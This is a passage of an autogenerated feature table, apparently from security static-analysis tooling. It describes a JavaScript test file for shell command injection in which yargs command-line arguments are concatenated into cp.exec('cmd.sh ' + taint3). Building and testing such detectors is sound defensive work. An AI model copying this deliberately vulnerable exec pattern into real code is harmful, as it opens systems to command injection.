autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:28:68:34 | 'yargs' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:37:68:40 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:37:68:40 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:37:68:40 | argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:37:68:40 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:37:68:40 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:3 | cp | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:8 | cp.exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | cp.exec ... taint3) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | cp.exec ... taint3) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | cp.exec ... taint3) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | cp.exec ... taint3) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | cp.exec ... taint3) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | exceptional return of cp.exec ... taint3) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | exceptional return of cp.exec ... taint3) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | exceptional return of cp.exec ... taint3) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | exceptional return of cp.exec ... taint3) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | exceptional return of cp.exec ... taint3) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:5:69:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:5:69:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:5:69:8 | exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:5:69:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:5:69:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:18 | "cmd.sh " | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- taint3 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:22:69:27 | taint3 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:22:69:27 | taint3 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:22:69:27 | taint3 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:22:69:27 | taint3 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:22:69:27 | taint3 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:22:69:27 | taint3 | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:16 | [...taint4] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:16 | [...taint4] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:16 | [...taint4] | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:16 | [...taint4] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:16 | [...taint4] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | [...tai ... ').argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | [...tai ... ').argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | [...tai ... ').argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | [...tai ... ').argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | [...tai ... ').argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | taint4 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | taint4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | taint4 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | taint4 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:6:71:40 | taint4 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | ...taint4 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | ...taint4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | ...taint4 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | ...taint4 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | ...taint4 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | taint4 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | taint4 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | taint4 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | taint4 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:10:71:15 | taint4 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:26 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:26 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:26 | require | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:26 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:26 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | exceptional return of require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | exceptional return of require('yargs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | exceptional return of require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | exceptional return of require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | exceptional return of require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | require('yargs') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:28:71:34 | 'yargs' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:37:71:40 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:37:71:40 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:37:71:40 | argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:37:71:40 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:37:71:40 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:3 | cp | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:8 | cp.exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 